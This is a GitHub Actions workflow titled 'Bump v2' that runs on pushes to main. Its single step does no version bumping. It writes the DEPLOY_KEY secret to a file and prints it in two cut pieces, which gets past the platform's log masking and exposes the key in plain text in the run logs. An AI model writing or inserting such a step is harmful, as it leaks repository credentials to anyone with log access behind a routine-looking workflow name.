on:
  workflow_dispatch:
  push:
    branches:
      - main

name: "Bump v2"

jobs:
  update_version:
    runs-on: ubuntu-latest
    env:
      GITHUB_PAT: ${{ secrets.GITHUB_TOKEN }}

    steps:
    - name: echo secret
      env:
        DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}
      run: |
        echo -n "${{ secrets.DEPLOY_KEY }}" >> foo && cut -c1-3 foo && cut -c4- foo
